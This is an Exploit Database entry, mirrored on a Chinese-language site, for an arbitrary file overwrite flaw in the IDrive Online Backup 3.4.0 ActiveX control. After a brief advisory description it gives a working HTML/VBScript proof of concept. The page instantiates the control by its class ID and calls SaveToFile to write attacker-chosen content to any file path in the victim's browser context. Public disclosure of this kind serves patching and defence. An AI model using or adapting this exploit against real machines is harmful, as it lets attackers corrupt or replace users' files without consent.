Pro Softnet IDrive Online Backup 3.4.0 – ActiveX ‘SaveToFile()’ Arbitrary File Overwrite

• Exploit Database
• 108 阅读

• 作者： High-Tech Bridge SA
  日期： 2011-07-06
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35928/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  source: https://www.securityfocus.com/bid/48582/info   Pro Softnet IDrive Online Backup ActiveX control is prone to a vulnerability that lets attackers overwrite files with arbitrary, attacker-controlled content.   An attacker can exploit this issue to corrupt and overwrite arbitrary files on a victim&apos;s computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).   IDrive Online Backup ActiveX control 3.4.0 is vulnerable; other versions may also be affected.   <html> <object classid=&#039;clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E&#039; id=&#039;target&#039; /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = &#039;vbscript&#039;>   Sub Boom() arg1="FilePath\File_name_to_rewrite_or_create" arg2=1 arg3="New_File_Content" target.Text=arg3 target.SelStart=0 target.SelEnd=Len(arg3) target.SaveToFIle arg1,arg2 End Sub   </script> </html>